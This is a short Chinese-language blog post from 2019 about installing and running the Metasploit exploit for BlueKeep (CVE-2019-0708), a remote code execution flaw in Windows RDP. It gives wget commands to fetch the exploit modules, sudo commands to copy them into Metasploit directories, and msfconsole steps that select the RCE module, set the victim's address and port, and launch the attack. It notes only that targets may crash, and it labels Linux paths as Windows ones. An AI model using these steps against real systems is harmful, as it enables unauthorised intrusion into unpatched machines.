0708MSF攻击套件安装
2019-09-07
CVE 2019-0708的exploit更新
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
下载地址
ruby脚本地址:
https://github.com/rapid7/metasploit-framework/pull/12283/files
百度网盘下载:
链接: https://pan.baidu.com/s/1WHqJ67ur_4s457DPCC38Ng 提取码: k7tq
wget 下载
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
mac电脑
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
命令如下
sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
sudo mkdir /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
windows电脑
rdp.rb -> /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
打开msfconsole
reload_all
测试发现可能导致机器蓝屏
使用msfconsole
进入后使用reload_all重新加载模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用info查看工具相关信息以及设置
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接
Reference
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0
https://github.com/rapid7/metasploit-framework/pull/12283/files
https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?from=timeline&isappinstalled=0